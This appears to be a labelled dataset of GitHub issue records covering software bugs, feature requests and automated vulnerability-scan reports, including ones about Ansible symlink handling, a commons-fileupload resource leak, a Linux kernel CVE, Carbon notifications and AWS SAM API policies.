<p align="center"><img src="https://user-images.githubusercontent.com/7836623/63638276-5970e900-c686-11e9-9de8-a54fc0a75b1b.png" width="20%" /></p> Integrate [Husky][gh-husky], the tool that make Git hooks easy and can prevent bad Git commits, pushes and more :dog: _woof_! ### Configuration The configuration file `.huskyrc.js` will be placed in the project root and includes the command to run for any [supported Git hook][gh-husky-docs-hooks]. It will at least contain configs for the following hooks: - `pre-commit` - Run `lint-staged` (GH-33) before each commit to ensure all staged files are compliant to all style guides. ## Tasks - [ ] Install [husky][npm-husky] package. - [ ] Implement `.huskyrc.js` configuration file. [gh-husky-docs-hooks]: https://github.com/typicode/husky/blob/master/DOCS.md#supported-hooks [gh-husky]: https://github.com/typicode/husky [npm-husky]: https://www.npmjs.com/package/husky
True
Husky - <p align="center"><img src="https://user-images.githubusercontent.com/7836623/63638276-5970e900-c686-11e9-9de8-a54fc0a75b1b.png" width="20%" /></p> Integrate [Husky][gh-husky], the tool that make Git hooks easy and can prevent bad Git commits, pushes and more :dog: _woof_! ### Configuration The configuration file `.huskyrc.js` will be placed in the project root and includes the command to run for any [supported Git hook][gh-husky-docs-hooks]. It will at least contain configs for the following hooks: - `pre-commit` - Run `lint-staged` (GH-33) before each commit to ensure all staged files are compliant to all style guides. ## Tasks - [ ] Install [husky][npm-husky] package. - [ ] Implement `.huskyrc.js` configuration file. [gh-husky-docs-hooks]: https://github.com/typicode/husky/blob/master/DOCS.md#supported-hooks [gh-husky]: https://github.com/typicode/husky [npm-husky]: https://www.npmjs.com/package/husky
main
husky integrate the tool that make git hooks easy and can prevent bad git commits pushes and more dog woof configuration the configuration file huskyrc js will be placed in the project root and includes the command to run for any it will at least contain configs for the following hooks pre commit run lint staged gh before each commit to ensure all staged files are compliant to all style guides tasks install package implement huskyrc js configuration file
1
544,346
15,892,568,548
IssuesEvent
2021-04-11 00:45:14
wso2/product-apim
https://api.github.com/repos/wso2/product-apim
closed
Make the try out button call to action
API-M 4.0.0 Priority/High React-UI T1 Type/Improvement
### Describe your problem(s) <!-- Describe why you think this project needs this feature --> ![image](https://user-images.githubusercontent.com/20179540/114185526-75142a80-9963-11eb-803a-57204bf066ee.png) ![image](https://user-images.githubusercontent.com/20179540/114213072-2a54db80-9980-11eb-964a-bf305d5531ba.png) ### Describe your solution <!-- Describe the feature/improvement --> ### How will you implement it <!-- If you like to suggest an approach or a design --> --- ### Optional Fields #### Related Issues: <!-- Any related issues from this/other repositories--> #### Suggested Labels: <!--Only to be used by non-members--> #### Suggested Assignees: <!--Only to be used by non-members-->
1.0
Make the try out button call to action - ### Describe your problem(s) <!-- Describe why you think this project needs this feature --> ![image](https://user-images.githubusercontent.com/20179540/114185526-75142a80-9963-11eb-803a-57204bf066ee.png) ![image](https://user-images.githubusercontent.com/20179540/114213072-2a54db80-9980-11eb-964a-bf305d5531ba.png) ### Describe your solution <!-- Describe the feature/improvement --> ### How will you implement it <!-- If you like to suggest an approach or a design --> --- ### Optional Fields #### Related Issues: <!-- Any related issues from this/other repositories--> #### Suggested Labels: <!--Only to be used by non-members--> #### Suggested Assignees: <!--Only to be used by non-members-->
non_main
make the try out button call to action describe your problem s describe your solution how will you implement it optional fields related issues suggested labels suggested assignees
0
2,453
8,639,874,412
IssuesEvent
2018-11-23 22:16:47
F5OEO/rpitx
https://api.github.com/repos/F5OEO/rpitx
closed
install.sh
V1 related (not maintained)
WTF? Why there is `apt-get` in install.sh? This is totally incorrect. I am using Arch Linux ARM, for example. There is no `apt`. =)
True
install.sh - WTF? Why there is `apt-get` in install.sh? This is totally incorrect. I am using Arch Linux ARM, for example. There is no `apt`. =)
main
install sh wtf why there is apt get in install sh this is totally incorrect i am using arch linux arm for example there is no apt
1
1,203
5,135,313,505
IssuesEvent
2017-01-11 11:54:27
ansible/ansible-modules-core
https://api.github.com/repos/ansible/ansible-modules-core
closed
find module doesn't recognize symlinks correctly
affects_2.0 bug_report waiting_on_maintainer
##### Issue Type: Bug Report ##### Ansible Version: 2.0.2 ##### Ansible Configuration: default configuration ##### Environment: debian jessie ##### Summary: When using the "find" module, symlinks are falsely identified as regular files. ##### Steps To Reproduce: How to reproduce: ``` mkdir /tmp/test touch /tmp/file ln -s /tmp/file /tmp/test/symlink ``` then run a playbook like this: ``` --- - hosts: localhost tasks: - find: paths="/tmp/test" register: find_result - debug: var=find_result ``` ##### Expected Results: ``` "files": [ { "islnk": true, "isreg": false, "path": "/tmp/test/symlink", } ] ``` ##### Actual Results: In the output, you will see ``` "files": [ { "islnk": false, "isreg": true, "path": "/tmp/test/symlink", } ] ``` When running `- find: paths="/tmp/test" file_type=file` to explicitly only match regular files, the result is the same (the symlink is in the results list). ##### Solution The reason for this is that [os.stat](https://docs.python.org/2/library/os.html#os.stat) is used to get the file info: https://github.com/ansible/ansible-modules-core/blob/devel/files/find.py#L316, and `os.stat` follows symlinks. Instead, [os.lstat](https://docs.python.org/2/library/os.html#os.lstat) should be used, which does not follow symlinks. It would also be possible to add an additional option `follow_symlinks=yes/no` to determine behaviour for this, but IMO, not following symlinks should be the default.
True
find module doesn't recognize symlinks correctly - ##### Issue Type: Bug Report ##### Ansible Version: 2.0.2 ##### Ansible Configuration: default configuration ##### Environment: debian jessie ##### Summary: When using the "find" module, symlinks are falsely identified as regular files. ##### Steps To Reproduce: How to reproduce: ``` mkdir /tmp/test touch /tmp/file ln -s /tmp/file /tmp/test/symlink ``` then run a playbook like this: ``` --- - hosts: localhost tasks: - find: paths="/tmp/test" register: find_result - debug: var=find_result ``` ##### Expected Results: ``` "files": [ { "islnk": true, "isreg": false, "path": "/tmp/test/symlink", } ] ``` ##### Actual Results: In the output, you will see ``` "files": [ { "islnk": false, "isreg": true, "path": "/tmp/test/symlink", } ] ``` When running `- find: paths="/tmp/test" file_type=file` to explicitly only match regular files, the result is the same (the symlink is in the results list). ##### Solution The reason for this is that [os.stat](https://docs.python.org/2/library/os.html#os.stat) is used to get the file info: https://github.com/ansible/ansible-modules-core/blob/devel/files/find.py#L316, and `os.stat` follows symlinks. Instead, [os.lstat](https://docs.python.org/2/library/os.html#os.lstat) should be used, which does not follow symlinks. It would also be possible to add an additional option `follow_symlinks=yes/no` to determine behaviour for this, but IMO, not following symlinks should be the default.
main
find module doesn t recognize symlinks correctly issue type bug report ansible version ansible configuration default configuration environment debian jessie summary when using the find module symlinks are falsely identified as regular files steps to reproduce how to reproduce mkdir tmp test touch tmp file ln s tmp file tmp test symlink then run a playbook like this hosts localhost tasks find paths tmp test register find result debug var find result expected results files islnk true isreg false path tmp test symlink actual results in the output you will see files islnk false isreg true path tmp test symlink when running find paths tmp test file type file to explicitly only match regular files the result is the same the symlink is in the results list solution the reason for this is that is used to get the file info and os stat follows symlinks instead should be used which does not follow symlinks it would also be possible to add an additional option follow symlinks yes no to determine behaviour for this but imo not following symlinks should be the default
1
93,245
15,883,904,880
IssuesEvent
2021-04-09 18:04:17
fluorumlabs/flow
https://api.github.com/repos/fluorumlabs/flow
opened
WS-2014-0034 (High) detected in commons-fileupload-1.3.3.jar
security vulnerability
## WS-2014-0034 - High Severity Vulnerability <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Library - <b>commons-fileupload-1.3.3.jar</b></p></summary> <p>The Apache Commons FileUpload component provides a simple yet flexible means of adding support for multipart file upload functionality to servlets and web applications.</p> <p>Library home page: <a href="http://commons.apache.org/proper/commons-fileupload/">http://commons.apache.org/proper/commons-fileupload/</a></p> <p>Path to dependency file: flow/flow-component-demo-helpers/pom.xml</p> <p>Path to vulnerable library: /home/wss-scanner/.m2/repository/commons-fileupload/commons-fileupload/1.3.3/commons-fileupload-1.3.3.jar,/home/wss-scanner/.m2/repository/commons-fileupload/commons-fileupload/1.3.3/commons-fileupload-1.3.3.jar,/home/wss-scanner/.m2/repository/commons-fileupload/commons-fileupload/1.3.3/commons-fileupload-1.3.3.jar,/home/wss-scanner/.m2/repository/commons-fileupload/commons-fileupload/1.3.3/commons-fileupload-1.3.3.jar,/home/wss-scanner/.m2/repository/commons-fileupload/commons-fileupload/1.3.3/commons-fileupload-1.3.3.jar,canner/.m2/repository/commons-fileupload/commons-fileupload/1.3.3/commons-fileupload-1.3.3.jar</p> <p> Dependency Hierarchy: - :x: **commons-fileupload-1.3.3.jar** (Vulnerable Library) <p>Found in HEAD commit: <a href="https://github.com/fluorumlabs/flow/commit/0ba54e0e818352f1db8ddc61f6153389759be39f">0ba54e0e818352f1db8ddc61f6153389759be39f</a></p> <p>Found in base branch: <b>master</b></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/high_vul.png' width=19 height=20> Vulnerability Details</summary> <p> The class FileUploadBase in Apache Commons Fileupload before 1.4 has potential resource leak - InputStream not closed on exception. <p>Publish Date: 2014-02-17 <p>URL: <a href=https://commons.apache.org/proper/commons-fileupload/changes-report.html>WS-2014-0034</a></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>7.5</b>)</summary> <p> Base Score Metrics: - Exploitability Metrics: - Attack Vector: Network - Attack Complexity: Low - Privileges Required: None - User Interaction: None - Scope: Unchanged - Impact Metrics: - Confidentiality Impact: High - Integrity Impact: None - Availability Impact: None </p> For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>. </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary> <p> <p>Type: Upgrade version</p> <p>Origin: <a href="https://github.com/apache/commons-fileupload/commit/5b4881d7f75f439326f54fa554a9ca7de6d60814">https://github.com/apache/commons-fileupload/commit/5b4881d7f75f439326f54fa554a9ca7de6d60814</a></p> <p>Release Date: 2019-09-26</p> <p>Fix Resolution: 1.4</p> </p> </details> <p></p> *** Step up your Open Source Security Game with WhiteSource [here](https://www.whitesourcesoftware.com/full_solution_bolt_github)
True
WS-2014-0034 (High) detected in commons-fileupload-1.3.3.jar - ## WS-2014-0034 - High Severity Vulnerability <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Library - <b>commons-fileupload-1.3.3.jar</b></p></summary> <p>The Apache Commons FileUpload component provides a simple yet flexible means of adding support for multipart file upload functionality to servlets and web applications.</p> <p>Library home page: <a href="http://commons.apache.org/proper/commons-fileupload/">http://commons.apache.org/proper/commons-fileupload/</a></p> <p>Path to dependency file: flow/flow-component-demo-helpers/pom.xml</p> <p>Path to vulnerable library: /home/wss-scanner/.m2/repository/commons-fileupload/commons-fileupload/1.3.3/commons-fileupload-1.3.3.jar,/home/wss-scanner/.m2/repository/commons-fileupload/commons-fileupload/1.3.3/commons-fileupload-1.3.3.jar,/home/wss-scanner/.m2/repository/commons-fileupload/commons-fileupload/1.3.3/commons-fileupload-1.3.3.jar,/home/wss-scanner/.m2/repository/commons-fileupload/commons-fileupload/1.3.3/commons-fileupload-1.3.3.jar,/home/wss-scanner/.m2/repository/commons-fileupload/commons-fileupload/1.3.3/commons-fileupload-1.3.3.jar,canner/.m2/repository/commons-fileupload/commons-fileupload/1.3.3/commons-fileupload-1.3.3.jar</p> <p> Dependency Hierarchy: - :x: **commons-fileupload-1.3.3.jar** (Vulnerable Library) <p>Found in HEAD commit: <a href="https://github.com/fluorumlabs/flow/commit/0ba54e0e818352f1db8ddc61f6153389759be39f">0ba54e0e818352f1db8ddc61f6153389759be39f</a></p> <p>Found in base branch: <b>master</b></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/high_vul.png' width=19 height=20> Vulnerability Details</summary> <p> The class FileUploadBase in Apache Commons Fileupload before 1.4 has potential resource leak - InputStream not closed on exception. <p>Publish Date: 2014-02-17 <p>URL: <a href=https://commons.apache.org/proper/commons-fileupload/changes-report.html>WS-2014-0034</a></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>7.5</b>)</summary> <p> Base Score Metrics: - Exploitability Metrics: - Attack Vector: Network - Attack Complexity: Low - Privileges Required: None - User Interaction: None - Scope: Unchanged - Impact Metrics: - Confidentiality Impact: High - Integrity Impact: None - Availability Impact: None </p> For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>. </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary> <p> <p>Type: Upgrade version</p> <p>Origin: <a href="https://github.com/apache/commons-fileupload/commit/5b4881d7f75f439326f54fa554a9ca7de6d60814">https://github.com/apache/commons-fileupload/commit/5b4881d7f75f439326f54fa554a9ca7de6d60814</a></p> <p>Release Date: 2019-09-26</p> <p>Fix Resolution: 1.4</p> </p> </details> <p></p> *** Step up your Open Source Security Game with WhiteSource [here](https://www.whitesourcesoftware.com/full_solution_bolt_github)
non_main
ws high detected in commons fileupload jar ws high severity vulnerability vulnerable library commons fileupload jar the apache commons fileupload component provides a simple yet flexible means of adding support for multipart file upload functionality to servlets and web applications library home page a href path to dependency file flow flow component demo helpers pom xml path to vulnerable library home wss scanner repository commons fileupload commons fileupload commons fileupload jar home wss scanner repository commons fileupload commons fileupload commons fileupload jar home wss scanner repository commons fileupload commons fileupload commons fileupload jar home wss scanner repository commons fileupload commons fileupload commons fileupload jar home wss scanner repository commons fileupload commons fileupload commons fileupload jar canner repository commons fileupload commons fileupload commons fileupload jar dependency hierarchy x commons fileupload jar vulnerable library found in head commit a href found in base branch master vulnerability details the class fileuploadbase in apache commons fileupload before has potential resource leak inputstream not closed on exception publish date url a href cvss score details base score metrics exploitability metrics attack vector network attack complexity low privileges required none user interaction none scope unchanged impact metrics confidentiality impact high integrity impact none availability impact none for more information on scores click a href suggested fix type upgrade version origin a href release date fix resolution step up your open source security game with whitesource
0
2,618
8,877,301,500
IssuesEvent
2019-01-12 23:10:14
chocolatey/chocolatey-package-requests
https://api.github.com/repos/chocolatey/chocolatey-package-requests
closed
RFP - DataStax DevCenter
Blocked Upstream Status: Available For Maintainer(s)
Database queries are at the heart of every data-intensive application. Understanding your database schema, usage patterns, and bottlenecks is key to writing high performance applications. DataStax DevCenter is a multi-platform visual database tool that allows you to manage database schema, develop queries, and tune performance. **Website**: https://www.datastax.com/products/datastax-devcenter-and-development-tools#DataStax-DevCenter **Download**: Win-x86: https://portal.datastax.com/downloads.php?dsedownload=tar/devcenter/DevCenter-win-x86.zip Win-x64: https://portal.datastax.com/downloads.php?dsedownload=tar/devcenter/DevCenter-win-x86_64.zip **Previous versions**: https://academy.datastax.com/downloads/download-previous-versions#dl-devcenter Thanks
True
RFP - DataStax DevCenter - Database queries are at the heart of every data-intensive application. Understanding your database schema, usage patterns, and bottlenecks is key to writing high performance applications. DataStax DevCenter is a multi-platform visual database tool that allows you to manage database schema, develop queries, and tune performance. **Website**: https://www.datastax.com/products/datastax-devcenter-and-development-tools#DataStax-DevCenter **Download**: Win-x86: https://portal.datastax.com/downloads.php?dsedownload=tar/devcenter/DevCenter-win-x86.zip Win-x64: https://portal.datastax.com/downloads.php?dsedownload=tar/devcenter/DevCenter-win-x86_64.zip **Previous versions**: https://academy.datastax.com/downloads/download-previous-versions#dl-devcenter Thanks
main
rfp datastax devcenter database queries are at the heart of every data intensive application understanding your database schema usage patterns and bottlenecks is key to writing high performance applications datastax devcenter is a multi platform visual database tool that allows you to manage database schema develop queries and tune performance website download win win previous versions thanks
1
189,853
22,047,138,981
IssuesEvent
2022-05-30 03:58:42
Trinadh465/device_renesas_kernel_AOSP10_r33_CVE-2022-0492
https://api.github.com/repos/Trinadh465/device_renesas_kernel_AOSP10_r33_CVE-2022-0492
closed
CVE-2021-42008 (High) detected in linuxlinux-4.19.88 - autoclosed
security vulnerability
## CVE-2021-42008 - High Severity Vulnerability <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Library - <b>linuxlinux-4.19.88</b></p></summary> <p> <p>The Linux Kernel</p> <p>Library home page: <a href=https://mirrors.edge.kernel.org/pub/linux/kernel/v4.x/?wsslib=linux>https://mirrors.edge.kernel.org/pub/linux/kernel/v4.x/?wsslib=linux</a></p> <p>Found in HEAD commit: <a href="https://github.com/Trinadh465/device_renesas_kernel_AOSP10_r33_CVE-2022-0492/commit/8d2169763c8858bce8d07fbb569f01ef9b30383b">8d2169763c8858bce8d07fbb569f01ef9b30383b</a></p> <p>Found in base branch: <b>master</b></p></p> </details> </p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Source Files (2)</summary> <p></p> <p> <img src='https://s3.amazonaws.com/wss-public/bitbucketImages/xRedImage.png' width=19 height=20> <b>/linux-4.19.72/drivers/net/hamradio/6pack.c</b> <img src='https://s3.amazonaws.com/wss-public/bitbucketImages/xRedImage.png' width=19 height=20> <b>/linux-4.19.72/drivers/net/hamradio/6pack.c</b> </p> </details> <p></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/high_vul.png' width=19 height=20> Vulnerability Details</summary> <p> The decode_data function in drivers/net/hamradio/6pack.c in the Linux kernel before 5.13.13 has a slab out-of-bounds write. Input from a process that has the CAP_NET_ADMIN capability can lead to root access. <p>Publish Date: 2021-10-05 <p>URL: <a href=https://vuln.whitesourcesoftware.com/vulnerability/CVE-2021-42008>CVE-2021-42008</a></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>7.8</b>)</summary> <p> Base Score Metrics: - Exploitability Metrics: - Attack Vector: Local - Attack Complexity: Low - Privileges Required: Low - User Interaction: None - Scope: Unchanged - Impact Metrics: - Confidentiality Impact: High - Integrity Impact: High - Availability Impact: High </p> For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>. </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary> <p> <p>Type: Upgrade version</p> <p>Origin: <a href="https://www.linuxkernelcves.com/cves/CVE-2021-42008">https://www.linuxkernelcves.com/cves/CVE-2021-42008</a></p> <p>Release Date: 2021-10-05</p> <p>Fix Resolution: v4.4.282,v4.9.281,v4.14.245,v4.19.205,v5.4.143,v5.10.61,v5.13.13,v5.14-rc7</p> </p> </details> <p></p> *** Step up your Open Source Security Game with WhiteSource [here](https://www.whitesourcesoftware.com/full_solution_bolt_github)
True
CVE-2021-42008 (High) detected in linuxlinux-4.19.88 - autoclosed - ## CVE-2021-42008 - High Severity Vulnerability <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Library - <b>linuxlinux-4.19.88</b></p></summary> <p> <p>The Linux Kernel</p> <p>Library home page: <a href=https://mirrors.edge.kernel.org/pub/linux/kernel/v4.x/?wsslib=linux>https://mirrors.edge.kernel.org/pub/linux/kernel/v4.x/?wsslib=linux</a></p> <p>Found in HEAD commit: <a href="https://github.com/Trinadh465/device_renesas_kernel_AOSP10_r33_CVE-2022-0492/commit/8d2169763c8858bce8d07fbb569f01ef9b30383b">8d2169763c8858bce8d07fbb569f01ef9b30383b</a></p> <p>Found in base branch: <b>master</b></p></p> </details> </p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Source Files (2)</summary> <p></p> <p> <img src='https://s3.amazonaws.com/wss-public/bitbucketImages/xRedImage.png' width=19 height=20> <b>/linux-4.19.72/drivers/net/hamradio/6pack.c</b> <img src='https://s3.amazonaws.com/wss-public/bitbucketImages/xRedImage.png' width=19 height=20> <b>/linux-4.19.72/drivers/net/hamradio/6pack.c</b> </p> </details> <p></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/high_vul.png' width=19 height=20> Vulnerability Details</summary> <p> The decode_data function in drivers/net/hamradio/6pack.c in the Linux kernel before 5.13.13 has a slab out-of-bounds write. Input from a process that has the CAP_NET_ADMIN capability can lead to root access. <p>Publish Date: 2021-10-05 <p>URL: <a href=https://vuln.whitesourcesoftware.com/vulnerability/CVE-2021-42008>CVE-2021-42008</a></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>7.8</b>)</summary> <p> Base Score Metrics: - Exploitability Metrics: - Attack Vector: Local - Attack Complexity: Low - Privileges Required: Low - User Interaction: None - Scope: Unchanged - Impact Metrics: - Confidentiality Impact: High - Integrity Impact: High - Availability Impact: High </p> For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>. </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary> <p> <p>Type: Upgrade version</p> <p>Origin: <a href="https://www.linuxkernelcves.com/cves/CVE-2021-42008">https://www.linuxkernelcves.com/cves/CVE-2021-42008</a></p> <p>Release Date: 2021-10-05</p> <p>Fix Resolution: v4.4.282,v4.9.281,v4.14.245,v4.19.205,v5.4.143,v5.10.61,v5.13.13,v5.14-rc7</p> </p> </details> <p></p> *** Step up your Open Source Security Game with WhiteSource [here](https://www.whitesourcesoftware.com/full_solution_bolt_github)
non_main
cve high detected in linuxlinux autoclosed cve high severity vulnerability vulnerable library linuxlinux the linux kernel library home page a href found in head commit a href found in base branch master vulnerable source files linux drivers net hamradio c linux drivers net hamradio c vulnerability details the decode data function in drivers net hamradio c in the linux kernel before has a slab out of bounds write input from a process that has the cap net admin capability can lead to root access publish date url a href cvss score details base score metrics exploitability metrics attack vector local attack complexity low privileges required low user interaction none scope unchanged impact metrics confidentiality impact high integrity impact high availability impact high for more information on scores click a href suggested fix type upgrade version origin a href release date fix resolution step up your open source security game with whitesource
0
3,621
14,633,794,967
IssuesEvent
2020-12-24 03:09:16
ContinuousEngineeringProject/ce-cli
https://api.github.com/repos/ContinuousEngineeringProject/ce-cli
opened
check the health of a jenkins x installation
area/jenkins x kind/feature step/maintain the factory
### **This is a Feature Request** ### **What would you like to be added** <!-- Describe as precisely as possible how this feature/enhancement should work from the user perspective. What should be changed, etc. --> ### **Why is this needed** ### **Comments** <!-- Any additional related comments that might help. Drawings/mockups would be extremely helpful (if required). -->
True
check the health of a jenkins x installation - ### **This is a Feature Request** ### **What would you like to be added** <!-- Describe as precisely as possible how this feature/enhancement should work from the user perspective. What should be changed, etc. --> ### **Why is this needed** ### **Comments** <!-- Any additional related comments that might help. Drawings/mockups would be extremely helpful (if required). -->
main
check the health of a jenkins x installation this is a feature request what would you like to be added why is this needed comments
1
277
3,041,897,833
IssuesEvent
2015-08-08 02:58:37
Homebrew/homebrew
https://api.github.com/repos/Homebrew/homebrew
closed
formula 'ntopng': Page "/lua/login.lua" was not found
maintainer feedback user configuration
This is a sequel of this issue https://github.com/Homebrew/homebrew/issues/41637 (it was closed but seems like it wasn't addressed). Please help!
True
formula 'ntopng': Page "/lua/login.lua" was not found - This is a sequel of this issue https://github.com/Homebrew/homebrew/issues/41637 (it was closed but seems like it wasn't addressed). Please help!
main
formula ntopng page lua login lua was not found this is a sequel of this issue it was closed but seems like it wasn t addressed please help
1
109,839
9,416,200,610
IssuesEvent
2019-04-10 14:13:25
vanilla/vanilla
https://api.github.com/repos/vanilla/vanilla
closed
Rich Editor add tests & fix behaviour around splitting nesting lists
Domain: Frontend Tests Domain: Rich Editor Type: Bug
Integration tests & fixes should be added for the following rich editor list scenarios. ## Changing a root level list item with children. **Before** ``` - Item 1 - Item 1.1 - Item 1.2 ``` **Action** - Format Item 1 as a different kind list. - Format Item 1 as each other block format. ## Splitting a nested list. **Before** ``` - Item 1 - Item 1.1 - Item 1.2 1. Item 1.2.1 2. Item 1.2.2 - Item 1.3 ``` **Actions** - Format Item 1.2 as a different kind list. - Format Item 1.2 as each other block format.
1.0
Rich Editor add tests & fix behaviour around splitting nesting lists - Integration tests & fixes should be added for the following rich editor list scenarios. ## Changing a root level list item with children. **Before** ``` - Item 1 - Item 1.1 - Item 1.2 ``` **Action** - Format Item 1 as a different kind list. - Format Item 1 as each other block format. ## Splitting a nested list. **Before** ``` - Item 1 - Item 1.1 - Item 1.2 1. Item 1.2.1 2. Item 1.2.2 - Item 1.3 ``` **Actions** - Format Item 1.2 as a different kind list. - Format Item 1.2 as each other block format.
non_main
rich editor add tests fix behaviour around splitting nesting lists integration tests fixes should be added for the following rich editor list scenarios changing a root level list item with children before item item item action format item as a different kind list format item as each other block format splitting a nested list before item item item item item item actions format item as a different kind list format item as each other block format
0
5,658
29,179,639,511
IssuesEvent
2023-05-19 10:46:11
carbon-design-system/carbon
https://api.github.com/repos/carbon-design-system/carbon
reopened
[Feature Request]: Notification support for multiple errors/values
type: enhancement 💡 status: needs triage 🕵️‍♀️ status: waiting for maintainer response 💬
### The problem There is an occasional case where a user has multiple errors return. Current notifications do not support multiple values for errors, it only shows one "title" "subtitle" pair. Creating a bunch of separate notifications does not make for a good user experience. ### The solution Ideally I would like a navigator attached to the Notification component that allows for the user to flip through different errors. This will also require an additional (optional) prop or maybe a change to the current props that would allow for an array of title subtitle pairs instead of just one. Example implementations: <img width="624" alt="image" src="https://user-images.githubusercontent.com/45407808/230192349-e991aa3c-047d-4dbd-9476-ddd5cbfd37d0.png"> <img width="1149" alt="image" src="https://user-images.githubusercontent.com/45407808/230192906-228b771f-62dd-435c-a95b-6ec44cacd0f0.png"> Neither of these examples are the ideal design, but workarounds that have been used. I think the navigator arrows would ideally be placed to the left of the X, though that is open to discussion and what fits best with design standards. ### Examples _No response_ ### Application/PAL Security Verify ### Business priority None ### Available extra resources _No response_ ### Code of Conduct - [X] I agree to follow this project's [Code of Conduct](https://github.com/carbon-design-system/carbon/blob/f555616971a03fd454c0f4daea184adf41fff05b/.github/CODE_OF_CONDUCT.md)
True
[Feature Request]: Notification support for multiple errors/values - ### The problem There is an occasional case where a user has multiple errors return. Current notifications do not support multiple values for errors, it only shows one "title" "subtitle" pair. Creating a bunch of separate notifications does not make for a good user experience. ### The solution Ideally I would like a navigator attached to the Notification component that allows for the user to flip through different errors. This will also require an additional (optional) prop or maybe a change to the current props that would allow for an array of title subtitle pairs instead of just one. Example implementations: <img width="624" alt="image" src="https://user-images.githubusercontent.com/45407808/230192349-e991aa3c-047d-4dbd-9476-ddd5cbfd37d0.png"> <img width="1149" alt="image" src="https://user-images.githubusercontent.com/45407808/230192906-228b771f-62dd-435c-a95b-6ec44cacd0f0.png"> Neither of these examples are the ideal design, but workarounds that have been used. I think the navigator arrows would ideally be placed to the left of the X, though that is open to discussion and what fits best with design standards. ### Examples _No response_ ### Application/PAL Security Verify ### Business priority None ### Available extra resources _No response_ ### Code of Conduct - [X] I agree to follow this project's [Code of Conduct](https://github.com/carbon-design-system/carbon/blob/f555616971a03fd454c0f4daea184adf41fff05b/.github/CODE_OF_CONDUCT.md)
main
notification support for multiple errors values the problem there is an occasional case where a user has multiple errors return current notifications do not support multiple values for errors it only shows one title subtitle pair creating a bunch of separate notifications does not make for a good user experience the solution ideally i would like a navigator attached to the notification component that allows for the user to flip through different errors this will also require an additional optional prop or maybe a change to the current props that would allow for an array of title subtitle pairs instead of just one example implementations img width alt image src img width alt image src neither of these examples are the ideal design but workarounds that have been used i think the navigator arrows would ideally be placed to the left of the x though that is open to discussion and what fits best with design standards examples no response application pal security verify business priority none available extra resources no response code of conduct i agree to follow this project s
1
5,062
25,942,545,022
IssuesEvent
2022-12-16 20:01:17
aws/serverless-application-model
https://api.github.com/repos/aws/serverless-application-model
closed
Updating API resource policy using mappings
type/docs area/resource/api maintainer/need-followup
I recently ran into an issue where resource policy on my API was getting updated but was not effective. So essentially a new deployment was not being created by SAM. It's because SAM processes the template before any mapping substitutions and according to SAM nothing changed and it doesn't generate a deployment. However, cloud-formation does the substitutions and updates the API. So you see updated policy in the console but its not effective. **Steps to reproduce the issue:** ```yaml Resources: LambdaAPIDefinition: Type: 'AWS::Serverless::Api' Properties: StageName: {Ref: Stage} DefinitionBody: REPLACE_WITH_SWAGGER_DEFINITION Auth: DefaultAuthorizer: AWS_IAM ResourcePolicy: CustomStatements: - Effect: Allow Principal: AWS: { 'Fn::FindInMap': [Map1, Map2, ReadOnlyApiAccounts] } Action: "execute-api:Invoke" Resource: - {'Fn::Sub': 'arn:${AWS::Partition}:execute-api:${AWS::Region}:${AWS::AccountId}:*'} Mappings: Map1: Map2: ReadOnlyApiAccounts : ["1234567890"] AllApiAccounts: ["1234567890"] ``` When i change ReadOnlyApiAccounts, i expect SAM to generate an API Deployment for policy changes to take effect but it doesn't.
True
